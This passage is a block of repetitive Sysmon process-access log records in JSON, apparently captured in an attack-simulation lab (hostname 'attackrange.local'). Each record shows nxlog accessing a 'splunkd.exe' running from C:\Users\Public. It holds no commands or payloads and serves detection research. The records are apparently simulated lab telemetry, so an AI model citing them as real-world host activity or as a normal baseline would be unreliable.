(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:16.550","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6629,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:17.550\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:17.550","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6630,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:18.550\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:18.550","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6631,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:19.550\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:19.550","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6632,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:20.550\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:20.550","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6633,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:21.550\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:21.550","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6634,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:22.550\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:22.550","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
